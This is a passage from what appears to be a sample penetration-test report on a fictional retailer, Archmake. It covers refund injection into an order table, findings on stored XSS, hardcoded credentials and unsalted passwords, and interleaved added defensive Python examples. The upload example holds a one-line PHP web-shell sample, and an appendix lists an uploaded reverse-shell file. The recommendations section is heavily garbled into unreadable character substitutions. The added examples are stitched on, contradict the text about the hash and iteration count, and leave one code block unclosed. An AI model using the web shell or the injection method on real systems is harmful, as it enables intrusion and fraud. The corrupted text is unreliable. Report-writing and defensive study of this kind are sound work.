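    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), base64.b64decode(salt_b64), int(iters))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))
```

Two users who both chose "abode" get different PBKDF2 records, so the precomputed table that recovered 996 of 1000 MD5 digests has nothing to match against, and at 600,000 iterations the 67 million MD5 guesses per second reported above shrink by several orders of magnitude. A memory-hard function such as scrypt or Argon2 raises the bar further; the migration path is to re-hash each user's password with the new scheme at their next successful login.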
Attacker Control of Archmake Transactions
While conducting further examination of the database backend, we determined that a number of tables were being updated on a regular basis. By monitoring the activity of these tables, it was discovered that as orders were entered into the system, they would be placed into the tables. On a periodic basis, another process would take action based upon the "Category".

Through a combination of monitoring database activity, and placing orders through the standard system, it was possible to identify the purpose of a subset of Categories:

Category  Meaning
1  Standard order, Card charged
2  Unknown
3  Rush order, Card charged
4  Refund, Card refunded funds
5  Unknown
6  Internal order

Once a mapping of transaction types was created, an attempt was made to manually inject data into this table. It was discovered that by injecting a valid CustID and an attacker owned credit card number with a category of 4 (Refund), an arbitrary amount of money could be refunded to the attackers. This was verified in cooperation with Archmake under controlled conditions.
It is believed, but not tested, that new orders could be placed and shipped to attacker created customer entities. This was not verified due to the disruption it would cause to the Archmake workflow.
By exerting control over the backend database system, it was possible to have control over the entirety of the Archmake order process. This is of extreme importance to Archmake, due to the amount of disruption it could cause to its business processes. Additionally, the ability of an attacker to obtain direct financial benefit from this attack makes Archmake an extremely attractive target.
For details of the exploited vulnerability, please see Appendix A.
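The refund worked because the process that acts on the table trusts a category-4 row on its own: nothing ties the refund to an order that was actually charged, to the card that was charged, or to the amount charged. The Python below is an added example, not from the report or from Archmake's system, of the verification that process should perform before moving money. It uses the category codes from the table above (1 and 3 charge the card, 4 refunds it); the ledger, the field names (including a `ref_txn` link from a refund to its original order, which the report does not say exists) and the amounts are assumptions.

```python
from dataclasses import dataclass
from typing import Optional

# Category codes as identified in the report's table: 1 and 3 charge the card, 4 refunds it.
CHARGE_CATEGORIES = {1, 3}
REFUND_CATEGORY = 4


@dataclass(frozen=True)
class Transaction:
    txn_id: int
    cust_id: int
    category: int
    card_last4: str                 # store only the last four digits (assumption)
    amount_cents: int
    ref_txn: Optional[int] = None   # refunds: the charged transaction being refunded


def validate_refund(ledger, refund):
    """Return None if the refund row is consistent with a prior charge in `ledger`,
    otherwise the reason it must be rejected before any money moves."""
    if refund.category != REFUND_CATEGORY:
        return "not a refund row"
    original = next((t for t in ledger
                     if t.txn_id == refund.ref_txn and t.category in CHARGE_CATEGORIES), None)
    if original is None:
        return "refund does not reference a charged order"
    if original.cust_id != refund.cust_id:
        return "customer differs from the original order"
    if original.card_last4 != refund.card_last4:
        return "refund card differs from the card originally charged"
    already_refunded = sum(t.amount_cents for t in ledger
                           if t.category == REFUND_CATEGORY and t.ref_txn == original.txn_id)
    if refund.amount_cents <= 0 or refund.amount_cents + already_refunded > original.amount_cents:
        return "refund exceeds the amount charged"
    return None


# Constructed ledger: one standard order for customer 7, charged 120.00 to a card ending 4242,
# followed by a legitimate partial refund of 50.00 to the same card.
LEDGER = [
    Transaction(1001, 7, 1, "4242", 12000),
    Transaction(1002, 7, 4, "4242", 5000, ref_txn=1001),
]


def check(refund):
    return validate_refund(LEDGER, refund)
```

Each rule rejects one variant of the injected row: a refund with no originating order, a valid CustID paired with a card the customer never used, and an amount larger than what was ever charged. The rules belong in the process that executes refunds (or in a database constraint and trigger), not only in the web front end, because the report shows the table being written directly.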
Conclusion
In the course of the external penetration test, Archmake suffered a cascading series of breaches that led to conditions that would directly harm the company as well as its customers.
The specific goals of the penetration test were stated as:
o Identify if a remote attacker could penetrate Archmake's defenses.
o Determine the impact of a security breach on:
    o The integrity of the company's order systems.
    o The confidentiality of the company's customer information.
    o The internal infrastructure and availability of Archmake's information systems.
These goals of the penetration test were met. It was determined that a remote attacker would be able to penetrate Archmake's defenses. To make this situation even worse, the initial attack vector can be discovered via automated scanning, creating a situation where a remote attack could be initiated on a non-targeted basis. The impact of this penetration led to the complete control of Archmake's information systems by the attacker.
Archmake's customer privacy was directly impacted through the attacker's ability to obtain a large amount of information about them, including clear text passwords, through the use of a brute force attack. This exposes the customers to direct attack, which could lead to financial impact. Customer trust in Archmake would be negatively impacted were such an event to occur.
It was possible to obtain complete and total control over the company order process. This provided the attacker with the ability to steal funds from Archmake, making this attack both very damaging and very attractive.
7%/'44%*<"+1'*,
uue Lo Lhe lmpacL Lo Lhe overall organlzaLlon as uncovered by Lhls peneLraLlon LesL, approprlaLe
resources should be allocaLed Lo ensure LhaL remedlaLlon efforLs are accompllshed ln a Llmely manner.
Whlle a comprehenslve llsL of lLems LhaL should be lmplemenLed ls beyond Lhe scope of Lhls
engagemenL, some hlgh level lLems are lmporLanL Lo menLlon.
1. ;B-F"B"#$ &#H "#/(%2" 'B-F"B"#$&$'(# (/ 2P&#M" 2(#$%(F &2%(++ &FF +4+$"B+: MlsconflguraLlon
and lnsecure deploymenL lssues were dlscovered across Lhe varlous sysLems. 1he vulnerablllLles
!898*,:*;.9 *81* ,8!.,* < :,7=>:?8@7.>
18-20120228 CopyrlghL 2012 Cffenslve SecurlLy LLd. All rlghLs reserved. age 24 of 32
LhaL arose can be mlLlgaLed Lhrough Lhe use of change conLrol processes on all server sysLems.
2. ;B-F"B"#$ %"M3F&% /'%"Q&FF %3F" +"$ %"0'"Q+: 8evlew Lhe flrewall rule seL on a regular basls Lo
ensure LhaL all sysLems open Lo lnLernal Lrafflc conLlnue Lo have a buslness reason Lo exlsL. We
recommend LhaL nlS1 S 800-41
7
be consulLed for guldellnes on flrewall conflguraLlon and
LesLlng.
3. ;B-F"B"#$ & -&$2P B&#&M"B"#$ -%(M%&B: CperaLlng a conslsLenL paLch managemenL program
per Lhe guldellnes ouLllned ln nlS1 S 800-40
8
ls an lmporLanL componenL ln malnLalnlng good
securlLy posLure. 1hls wlll help Lo llmlL Lhe aLLack surface LhaL resulLs from runnlng unpaLched
lnLernal servlces.
4. Conduct regular vulnerability assessments: As part of an effective organizational risk management strategy, vulnerability assessments should be conducted on a regular basis. Doing so will allow the organization to determine if the installed security controls are installed properly, operating as intended, and producing the desired outcome. Consult NIST SP 800-30 [9] for guidelines on operating an effective risk management program.
5. Restrict network access to server management interfaces: Proper network segmentation will reduce exposure to internal attacks against the server environment. Operating a well-designed DMZ will allow Archmake to conduct its e-commerce business in a manner that does not expose internal systems to attack. Consult FIPS 191 [10] for guidelines on securing local area networks.
6. Restrict access to critical systems: It is recommended that the database server be isolated from other systems. If possible, a whitelist of database commands should be implemented specifying the minimum number of commands required to support business operations. This is in line with the system design concept of least privilege, and will limit the amount of damage an attacker can inflict on corporate resources. Consult NIST SP 800-27 RevA [11] for guidelines on achieving a security baseline for IT systems.
7. Apply industry methodologies for secure software design: The use of hard coded credentials within custom applications is highly discouraged. Users should have a need to know, and be required to provide, credentials before accessing confidential and proprietary data. This provides better security, and an audit trail that allows the business to tie actions to specific user accounts.
For details on the specific exploited vulnerabilities, please see Appendix A.

[7] http://csrc.nist.gov/publications/nistpubs/800-41-Rev1/sp800-41-rev1.pdf
[8] http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf
[9] http://csrc.nist.gov/publications/PubsDrafts.html#SP-800-30-Rev.%201
[10] http://csrc.nist.gov/publications/fips/fips191/fips191.pdf
[11] http://csrc.nist.gov/publications/nistpubs/800-27A/SP800-27-RevA.pdf
Risk Rating
The overall risk posed to Archmake as a result of this penetration test is High. A non-targeted attacker has the potential to damage the company in a manner that would have direct operational and financial impact.

Appendix A: Vulnerability Detail and Mitigation
Risk Rating Scale
In accordance with NIST SP 800-30, discovered vulnerabilities are ranked based upon likelihood and impact to determine overall risk.
Unprotected WP-Admin Access
Rating: High
Affected System: www.Archmake.com
Description: Access to the www.Archmake.com administrative interface is only protected by a username and password combination. It is suggested best practice to only allow specific hosts access to any administrative interface.
Impact: If an attacker is able to obtain valid credentials or a valid session to the administrative interface, there are no additional controls in place to prevent privilege escalation. In the course of this penetration test, additional layers of defense at this layer would have mitigated the initially discovered foothold gained by the attackers.
Remediation: Implement controls to only allow connections to the administrative interface from known hosts. A potential method for achieving this could be through only allowing access from clients that are behind the company VPN or a whitelist of known trusted hosts.
Vulnerable WordPress Search Plugin
Rating: High
Affected System: www.Archmake.com
Description: The www.Archmake.com system is operating with a vulnerable WordPress plugin (Relevanssi User Searches) that interacts with the public search function of the site. JavaScript submitted through the public search function is stored by the plugin and later rendered without encoding, so the flaw is exploited as a stored XSS vulnerability.
Public Exploit: http://www.exploit-db.com/exploits/16233/
Impact: This vulnerability can be utilized to obtain a valid session to the WordPress administration interface, providing the attacker with administrative access to the overall system.
Remediation: Update the Relevanssi plugin to a version greater than 2.7.2.
Webserver bzip Vulnerability
Rating: High
Affected System: www.Archmake.com
Description: The version of bzip2 running on the remote system is vulnerable to a race condition that, when properly exploited, results in arbitrary code execution.
Public Exploit: http://www.exploit-db.com/exploits/18147/
Impact: By utilizing a public exploit for this flaw from the foothold already gained on the web server, root level privileges can be obtained.
Remediation: Apply vendor-supplied patches to update bzip2 to a version greater than 1.0.5-6.
Vulnerable Splunk Installation
Rating: High
Affected System: 10.10.0.3
Description: The version of Splunk on the remote host is vulnerable to remote command injection.
Public Exploit: http://www.exploit-db.com/exploits/18245/
Impact: An unauthenticated remote user with access to the Splunk host can execute commands as the Local System account.
Remediation: Update the Splunk installation to version 4.2.5 or higher.
Hardcoded Username and Password in Executable
Rating: High
Affected System: 10.10.0.3
Description: The exportcsv.exe application on the remote host was found to be operating with database credentials hardcoded into the application.
Impact: By extracting the credentials from the application, direct connections to the database server were possible. The credentials had administrative level access, which provides full control over the database contents. This has the effect of granting total control of the backend system to the attacker.
Remediation: Deploy interactive authentication as part of the application start-up process. Have unique username/password combinations for each entity that accesses the system. Create a whitelist of the least number of required commands that are permitted for each account.
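The extraction step described above is what a reviewer should be able to repeat against any build before it ships. The following is an added example, not part of the report and not taken from exportcsv.exe: a minimal strings-style sweep that pulls printable ASCII and UTF-16LE runs out of a binary image and flags connection-string fragments such as Password= or pwd=. SAMPLE_BINARY is a constructed stand-in for the real executable, with made-up credentials.

```python
"""Scan an executable image for embedded credential strings.

Added example, not part of the report or of exportcsv.exe. SAMPLE_BINARY
is a constructed stand-in with made-up credentials.
"""
import re
from typing import List, Tuple

MIN_RUN = 6  # shortest printable run worth reporting, as in `strings -n 6`

# Key/value fragments that typically mark embedded database credentials
# (ADO/ODBC-style connection strings). Values stop at ';', quotes or whitespace.
CRED_PATTERNS = [
    re.compile(r"(?i)\b(password|pwd)\s*=\s*([^;\"'\s]+)"),
    re.compile(r"(?i)\b(user\s*id|uid|user)\s*=\s*([^;\"'\s]+)"),
]


def extract_strings(blob: bytes, min_run: int = MIN_RUN) -> List[str]:
    """Return printable runs of at least `min_run` characters.

    Windows binaries carry many strings as UTF-16LE, so both plain ASCII runs
    and ASCII-in-UTF-16LE runs (P\\x00a\\x00s\\x00s\\x00...) are collected.
    """
    ascii_runs = re.compile(rb"[\x20-\x7e]{%d,}" % min_run)
    utf16_runs = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_run)
    found = [m.group().decode("ascii") for m in ascii_runs.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in utf16_runs.finditer(blob)]
    return found


def find_credentials(blob: bytes) -> List[Tuple[str, str]]:
    """Return (field, value) pairs for every credential-looking fragment."""
    hits = []
    for s in extract_strings(blob):
        for pattern in CRED_PATTERNS:
            for field, value in pattern.findall(s):
                hits.append((field.lower(), value))
    return hits


# Constructed sample image: a DOS-header stub, an ASCII connection string and a
# UTF-16LE service password, padded with NULs the way real PE data sections are.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + b"\x00" * 16
    + b"Server=10.10.0.3;Database=orders;User Id=sa;Password=Sup3rS3cret!;"
    + b"\x00" * 8
    + "Export complete".encode("utf-16-le") + b"\x00" * 4
    + "pwd=W1ndowsS3rv1ce".encode("utf-16-le") + b"\x00\x00"
)


if __name__ == "__main__":
    for field, value in find_credentials(SAMPLE_BINARY):
        print(f"{field}: {value}")
```

Run against a real build with `find_credentials(open("exportcsv.exe", "rb").read())`. The scan is deliberately crude: it finds the easy case (credentials stored as a plain connection string), which is exactly the case an attacker with a copy of the binary finds first. Obfuscated or compressed strings need a debugger or runtime capture, but that is no reason to leave the easy case in place.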
Database Unsalted Password Storage
Rating: High
Affected System: 10.10.0.3
Description: Passwords stored on the database server were discovered to be unsalted [12].
Impact: By storing passwords without salting them, dictionary and brute force attacks against the system were able to obtain the clear text values with minimal effort, since one precomputed hash per guess applies to every account at once. In this instance, it provided the attackers with the clear text passwords of the vast majority of Archmake's customers, exposing them to the potential of future attacks.
Remediation: Store passwords using a purpose-built password hash (for example bcrypt, scrypt or PBKDF2) with a unique random salt per account, rather than a single fast unsalted hash. Ensure that all appropriate measures are taken to ensure the security of sensitive data at rest.
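The following added example (not part of the report, and not Archmake's code) shows the difference in attacker cost between the two schemes. The report does not name the hash Archmake used; SHA-1 stands in for an unsalted fast hash, and PBKDF2-HMAC-SHA256 with a per-account salt stands in for the remediation. The user table and word list are constructed.

```python
"""Unsalted versus salted password storage.

Added example, not part of the report. The unsalted hash (SHA-1), the
PBKDF2 iteration count, USERS and WORDLIST are all assumptions.
"""
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

PBKDF2_ITERATIONS = 100_000  # assumption; raise it as far as login latency allows


def hash_unsalted(password: str) -> str:
    """Weak scheme: one fast, unsalted digest (assumed SHA-1)."""
    return hashlib.sha1(password.encode()).hexdigest()


def hash_salted(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Stronger scheme: fresh 16-byte random salt, iterated PBKDF2-HMAC-SHA256."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_salted(password: str, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison so timing does not leak how many bytes matched."""
    return hmac.compare_digest(hash_salted(password, salt)[1], digest)


def crack_unsalted(stored: Dict[str, str], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """One digest per word serves every user: work = len(wordlist), and the
    lookup table can be precomputed once and reused across databases."""
    table = {hash_unsalted(w): w for w in wordlist}
    recovered = {user: table[h] for user, h in stored.items() if h in table}
    return recovered, len(wordlist)


def crack_salted(stored: Dict[str, Tuple[bytes, bytes]], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Each guess must be recomputed per user with that user's salt, and every
    guess costs PBKDF2_ITERATIONS hash rounds instead of one."""
    recovered: Dict[str, str] = {}
    work = 0
    for user, (salt, digest) in stored.items():
        for word in wordlist:
            work += 1
            if verify_salted(word, salt, digest):
                recovered[user] = word
                break
    return recovered, work


# Constructed sample: three customer accounts, two sharing a dictionary word.
USERS = {"alice": "summer2011", "bob": "summer2011", "carol": "xq7!Lk92#vB0"}
WORDLIST = ["password", "123456", "summer2011", "letmein"]


def demo() -> dict:
    unsalted = {u: hash_unsalted(p) for u, p in USERS.items()}
    salted = {u: hash_salted(p) for u, p in USERS.items()}
    rec_u, work_u = crack_unsalted(unsalted, WORDLIST)
    rec_s, work_s = crack_salted(salted, WORDLIST)
    return {
        "unsalted_identical": unsalted["alice"] == unsalted["bob"],  # same word, same digest
        "salted_identical": salted["alice"][1] == salted["bob"][1],   # same word, different digest
        "unsalted_recovered": rec_u,
        "salted_recovered": rec_s,
        "unsalted_work": work_u,  # 4 digests for the whole customer table
        "salted_work": work_s,    # 10 PBKDF2 runs, growing with every user added
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Salting does not rescue a dictionary password: alice and bob are recovered under both schemes. What the salt buys is that the attacker's table is no longer shared across accounts or across breaches, and the iterated hash makes every one of those per-account guesses expensive; that is why the unsalted scheme gave up "the vast majority" of customers in one pass.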
Unprotected Database Server
Rating: High
Affected System: 10.10.0.3
Description: The database server was found to be operating on a flat network, which allowed connections from the local LAN. Due to the sensitivity of this system, additional controls should be put into place to ensure its protection.
Impact: Once credentials to the database server were discovered, it was trivial to obtain full control over the system. This resulted in a much greater impact to the organization.
Remediation: Implement additional layers of defense for the database server. This may include moving the database server to a separate network and strictly controlling ingress and egress traffic to it.
Database Contains Unencrypted Credit Card Numbers
Rating: High
Affected System: 10.10.0.3

[12] http://en.wikipedia.org/wiki/Salt_(cryptography)
Description: It was discovered that in the course of transaction processing, credit card numbers are stored in clear text on the database server for a brief period of time.
Impact: While the time that credit card numbers are in the database is short, it was enough of an exposure to allow the attackers to obtain them on a consistent basis. This compromised the confidentiality of all credit cards that are processed by the system.
Remediation: The design and architecture of the transaction processing system should be reviewed. This review will identify which additional controls should be put in place to better protect customer data.
Lack of Transaction Verification
Rating: High
Affected System: 10.10.0.3
Description: No verification was in place to validate the source of transactions submitted to the database for processing.
Impact: By not validating the origin and integrity of the submitted transactions, it was possible for the attackers to submit arbitrary transactions and have them processed by the system as if they were authentic. In the course of the penetration test, this vulnerability allowed refunds to be processed against attacker-supplied credit cards.
Remediation: Controls should be added to verify the origin and integrity of transactions before processing.
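One control of the kind the remediation calls for, as an added example that is not part of the report or of Archmake's order system: the order front end tags every transaction with an HMAC over its canonical fields under a key provisioned out of band, and the processing side recomputes the tag, refuses mismatches and replays, and rejects sources it has no key for. The key name, field names and sample transactions are assumptions.

```python
"""Verifying the origin and integrity of transactions before processing.

Added example, not part of the report. SIGNING_KEYS, SIGNED_FIELDS and the
transactions in demo() are assumptions for illustration.
"""
import hashlib
import hmac
import json
import secrets
from typing import List, Optional, Set, Tuple

# Assumption: one key per trusted submitter, held by the front end and the
# processor only. It must not live in the database the attacker already controls.
SIGNING_KEYS = {"web-frontend": secrets.token_bytes(32)}

SIGNED_FIELDS = ("txn_id", "source", "type", "amount_cents", "card_token")


def canonical(txn: dict) -> bytes:
    """Deterministic encoding of the signed fields: sorted keys, no whitespace."""
    body = {k: txn[k] for k in SIGNED_FIELDS}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def sign_transaction(txn: dict, key: bytes) -> dict:
    """Front-end side: attach an HMAC-SHA256 tag over the canonical fields."""
    signed = dict(txn)
    signed["mac"] = hmac.new(key, canonical(txn), hashlib.sha256).hexdigest()
    return signed


def verify_transaction(txn: dict, seen_ids: Set[str]) -> Optional[str]:
    """Processor side: return None if acceptable, else the reason for rejection."""
    if "mac" not in txn or any(k not in txn for k in SIGNED_FIELDS):
        return "missing fields"
    key = SIGNING_KEYS.get(txn["source"])
    if key is None:
        return "unknown source"
    expected = hmac.new(key, canonical(txn), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, txn["mac"]):   # constant-time compare
        return "bad mac"
    if txn["txn_id"] in seen_ids:                        # same valid tag submitted twice
        return "replay"
    seen_ids.add(txn["txn_id"])
    return None


def process_batch(batch: List[dict]) -> List[Tuple[str, str]]:
    """Verify each transaction in order; a real processor would persist seen ids."""
    seen: Set[str] = set()
    results = []
    for txn in batch:
        reason = verify_transaction(txn, seen)
        results.append((txn.get("txn_id"), "processed" if reason is None else "rejected: " + reason))
    return results


def demo() -> List[Tuple[str, str]]:
    key = SIGNING_KEYS["web-frontend"]
    sale = sign_transaction({"txn_id": "T1001", "source": "web-frontend", "type": "sale",
                             "amount_cents": 4999, "card_token": "tok_customer_1"}, key)
    # Attacker rewrites a captured sale into a refund to their own card, reusing its tag.
    forged = dict(sale, txn_id="T1002", type="refund", card_token="tok_attacker")
    # Attacker resubmits the genuine sale unchanged.
    replay = dict(sale)
    # Attacker injects a refund directly, claiming a source the processor has no key for.
    unsigned = {"txn_id": "T1003", "source": "batch-job", "type": "refund",
                "amount_cents": 4999, "card_token": "tok_attacker", "mac": "00" * 32}
    return process_batch([sale, forged, replay, unsigned])


if __name__ == "__main__":
    for txn_id, status in demo():
        print(txn_id, status)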
SSH Key Files not Password Protected
Rating: Medium
Affected System: www.Archmake.com
Description: Once root privileges were obtained, it was possible to make use of the installed SSH key files as they were not passphrase protected. It is considered best practice to protect SSH private key files through the use of a passphrase.
Impact: By utilizing the existing SSH key files and SSH tunnels, it was possible to remotely access the system without altering the root user's password. This minimized the chances of being detected.
Remediation: Use passphrases to protect all SSH private key files.
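Checking for this condition across a host is straightforward, because an unprotected key announces itself in its file header. The following added example (not part of the report) classifies a private key file by its PEM or OpenSSH header and reports whether the key material is encrypted. The sample keys are constructed stubs with dummy key material; only the headers and the OpenSSH ciphername field matter to the check.

```python
"""Find SSH private keys that are not passphrase protected.

Added example, not part of the report. SAMPLE_KEYS are constructed stubs;
_openssh_stub builds an openssh-key-v1 file around placeholder key bytes.
"""
import base64
import os
import struct
from typing import Dict, List

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: big-endian uint32 length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def key_is_encrypted(text: str) -> bool:
    """True if the private key in `text` needs a passphrase; ValueError if unrecognised."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN "):
        raise ValueError("not a PEM or OpenSSH private key")
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        # openssh-key-v1 layout: magic, ciphername ("none" means plaintext), kdfname, ...
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        (n,) = struct.unpack(">I", body[off:off + 4])
        return body[off + 4:off + 4 + n] != b"none"
    if header == "-----BEGIN ENCRYPTED PRIVATE KEY-----":   # PKCS#8, encrypted
        return True
    if header == "-----BEGIN PRIVATE KEY-----":             # PKCS#8, plaintext
        return False
    if header.endswith(" PRIVATE KEY-----"):                # legacy RSA/DSA/EC PEM
        return any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines[1:])
    raise ValueError("unrecognised header: " + header)


def unprotected_keys(files: Dict[str, str]) -> List[str]:
    """Names (from a name -> contents map) of keys that lack a passphrase."""
    return sorted(name for name, text in files.items() if not key_is_encrypted(text))


def scan_directory(path: str) -> List[str]:
    """Walk `path` (for example /root/.ssh) and list files holding unprotected keys."""
    hits = []
    for root, _, names in os.walk(path):
        for name in names:
            full = os.path.join(root, name)
            try:
                with open(full, encoding="ascii") as fh:
                    if not key_is_encrypted(fh.read()):
                        hits.append(full)
            except (OSError, ValueError):   # unreadable, binary, or not a key
                continue
    return sorted(hits)


def _openssh_stub(cipher: bytes, kdf: bytes, kdfopts: bytes) -> str:
    """Constructed openssh-key-v1 file with placeholder key material."""
    blob = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
            + struct.pack(">I", 1) + _ssh_string(b"\x00" * 51) + _ssh_string(b"\x00" * 64))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + body + "\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLE_KEYS = {
    "id_rsa": _openssh_stub(b"none", b"none", b""),
    "id_ed25519": _openssh_stub(b"aes256-ctr", b"bcrypt", b"\x00" * 20),
    "legacy_plain.pem": "-----BEGIN RSA PRIVATE KEY-----\nMIIE(dummy)\n-----END RSA PRIVATE KEY-----\n",
    "legacy_protected.pem": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                             "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                             "MIIE(dummy)\n-----END RSA PRIVATE KEY-----\n"),
}


if __name__ == "__main__":
    print("unprotected:", unprotected_keys(SAMPLE_KEYS))
```

On a live host, `scan_directory("/root/.ssh")` (and each user's ~/.ssh) lists the files to fix; `ssh-keygen -p -f <file>` adds a passphrase in place. A passphrase only raises the cost for an attacker who already has root, so the finding is rated Medium; the unprotected keys in this engagement mattered because they gave persistent access without touching the root password.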
Outbound Access from Webserver
Rating: Medium
Affected System: www.Archmake.com
Description: The www.Archmake.com system was discovered to allow outbound connections to specific ports. While some filtering is in place, outbound connections to TCP port 53 were discovered to be open. It is best practice for a server in the DMZ to accept externally initiated connections only on its valid service ports and to initiate outbound connections only where a specific business need exists.
Impact: The permitted outbound connections were used to establish interactive access to the impacted system. If this were not allowed, the attacker's abilities would have been impaired.
Remediation: Employ egress filtering in the DMZ to only allow servers to initiate connections to specific hosts on specific ports.
WordPress Upload Plugin Invalid File Type Checks
Rating: Low
Affected System: www.Archmake.com
Description: The admin upload plugin has implemented file type checking in a manner that is ineffective.
Impact: The impact of this issue is low due to the fact that only administrative users have access to this functionality. This flaw was utilized to ease transferring files to the impacted system. If this issue was corrected, alternative means for file transfer would have been utilized.
Remediation: Correct the file type checking or disable the plugin if the functionality is not required.
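The report does not say how the plugin's check fails, but Appendix B shows that a file named php-reverse-shell.png.php was accepted. The following added example (not the plugin's own code) therefore assumes a check that passes any name containing an allowed extension, and places a strict replacement beside it: a bare name with exactly one allowed extension, content whose magic bytes match that extension, and a server-chosen name on disk. The sample uploads are constructed.

```python
"""Upload file-type validation: an ineffective check beside a strict one.

Added example, not the plugin's code. weak_check() is an assumption about
how the plugin fails; strict_check() is the replacement. SAMPLES are constructed.
"""
import secrets
from typing import Dict, Tuple

# Allowed extensions and the magic bytes each must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}


def weak_check(filename: str, data: bytes) -> bool:
    """Assumed ineffective check: passes if an allowed extension appears anywhere."""
    name = filename.lower()
    return any("." + ext in name for ext in ALLOWED)


def strict_check(filename: str, data: bytes) -> Tuple[bool, str]:
    """Accept a bare name with exactly one allowed extension whose content matches it.

    Returns (True, extension) on success, (False, reason) otherwise.
    """
    if "/" in filename or "\\" in filename or filename.startswith("."):
        return False, "path separator or hidden file"
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "missing or multiple extensions"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, "extension ." + ext + " not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content is not " + ext
    return True, ext


def stored_name(ext: str) -> str:
    """Server-chosen name; the client-supplied name never reaches the filesystem."""
    return secrets.token_hex(16) + "." + ext


PNG_DATA = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16      # constructed PNG header
PHP_DATA = b"<?php system($_GET['c']); ?>"           # constructed web-shell stand-in

SAMPLES = [
    ("face.png", PNG_DATA),                      # legitimate upload
    ("php-reverse-shell.png.php", PHP_DATA),     # double extension, as in Appendix B
    ("shell.php", PHP_DATA),                     # plain PHP
    ("../../wp-config.png", PNG_DATA),           # path traversal in the name
    ("notes.png", PHP_DATA),                     # right extension, wrong content
]


def evaluate(samples=SAMPLES) -> Dict[str, Tuple[bool, bool]]:
    """Map each sample name to (weak_check result, strict_check result)."""
    return {name: (weak_check(name, data), strict_check(name, data)[0]) for name, data in samples}


if __name__ == "__main__":
    for name, (weak, strict) in evaluate().items():
        print(f"{name:30} weak={weak!s:5} strict={strict}")
```

The content check is a secondary signal: a polyglot that starts with a PNG header and carries PHP afterwards still passes it. What carries the protection is that the stored file ends in an image extension the web server will never hand to the PHP interpreter, under a name the uploader did not choose. The single-extension rule also rejects legitimate names such as my.holiday.png; relax it to "last extension only" if that matters, but keep the path and magic-byte checks.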


Appendix B: List of Changes made to Archmake Systems
The following files were altered or created as part of this penetration test. Specific details of how or why these files were altered are included in the Attack Narrative.
www.Archmake.com: /root/.ssh/authorized_keys
Files uploaded into /var/www/wp-content/uploads:
o face.png
o php-reverse-shell.png.php
o race.png
10.10.0.3: All files located in C:\Users\hacker\Downloads
Windows domain: "hacker" user created


Appendix C: About Offensive Security
Offensive Security advocates penetration testing for impact as opposed to penetration testing for coverage. Penetration testing for coverage has risen in popularity in recent years as a simplified method for companies to meet regulatory needs. As a form of vulnerability scanning, penetration testing for coverage includes selective verification of discovered issues through exploitation. This allows service providers to conduct the work largely through the use of automated toolsets and maintain consistency of product across multiple engagements.
Penetration testing for impact is a form of attack simulation under controlled conditions. This more closely mimics the real world, targeted attack threat that organizations face on a day-to-day basis. Penetration testing for impact is a goal-based assessment that identifies more than a simple vulnerability inventory, and instead provides the true business impact of a breach. An impact-based penetration test identifies areas for improvement that will result in the highest rate of return for the business.
Penetration testing for impact poses the challenge of requiring a high skillset to successfully complete. As demonstrated in this sample report, Offensive Security believes that it is uniquely qualified to deliver world-class results when conducting penetration tests for impact due to the level of expertise found within our team of security professionals. Offensive Security does not maintain a separate team for penetration testing and other activities that the company is engaged in. This means that the same individuals that are involved in Offensive Security's industry leading performance-based training, the production of industry standard tools such as BackTrack Linux, authors of best selling books, and maintainers of industry references such as Exploit-DB are the same individuals that are involved in the delivery of services.
Offensive Security offers a product that cannot be matched in the current market. However, we may not be the right fit for every job. Offensive Security typically conducts consulting services with a low volume, high skill ratio to allow Offensive Security staff to more closely mimic real world situations. This also allows customers to have increased access to industry-recognized expertise all while keeping costs reasonable. As such, high volume, fast turnaround engagements are often not a good fit. Offensive Security is focused on conducting high quality, high impact assessments and is actively sought out by customers in need of services that cannot be delivered by other vendors.
If you would like to discuss your penetration testing needs, please contact us at info@offsec.com.
